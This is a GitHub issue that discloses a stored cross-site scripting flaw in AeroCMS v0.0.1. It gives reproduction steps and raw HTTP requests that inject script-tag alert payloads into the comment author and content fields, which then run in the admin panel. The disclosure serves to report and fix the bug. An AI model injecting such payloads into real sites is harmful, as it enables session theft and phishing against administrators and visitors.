Skip to content
This repository has been archived by the owner on May 8, 2023. It is now read-only.

Stored XSS Vulnerability on AeroCMS v0.0.1 #11

Open
rahadchowdhury opened this issue Mar 13, 2023 · 0 comments
Open

Stored XSS Vulnerability on AeroCMS v0.0.1 #11

rahadchowdhury opened this issue Mar 13, 2023 · 0 comments

Comments

@rahadchowdhury
Copy link

Description:
I found Stored Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section "Author" and "Content" field. When I use malicious code or use any xss payload then the browser give me result. Because a browser can not know if the script should be trusted or not.

CMS Version:
v0.0.1

Affected URL:
http://127.0.0.1/AeroCMS/post.php

Steps to Reproduce:

  1. At first open any post.
  2. then fill up comments section and your request data will be

POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test&comment_email=[email protected]&comment_content=test&create_comment=

  1. "comment_author" and "comment_content" parameters are vulnerable. Let's try to use any XSS payload in "comment_author" and "comment_content" parameters and your request data will be

POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test"><script>alert(111)</script>&comment_email=[email protected]&comment_content=test"><script>alert('XSS')</script>&create_comment=

1
2

  1. Now login admin panel and go to "Comments" Menu
  2. You will see XSS pop up (If admin approve comment so XSS pop up execute in post section).

3
4
5

Proof of Concept:
You can see the Proof of Concept. which I've attached screenshots and video to confirm the vulnerability.

Stored.XSS.on.AeroCMS.mp4

Impact:
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.

Let me know if any further info is required.

Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant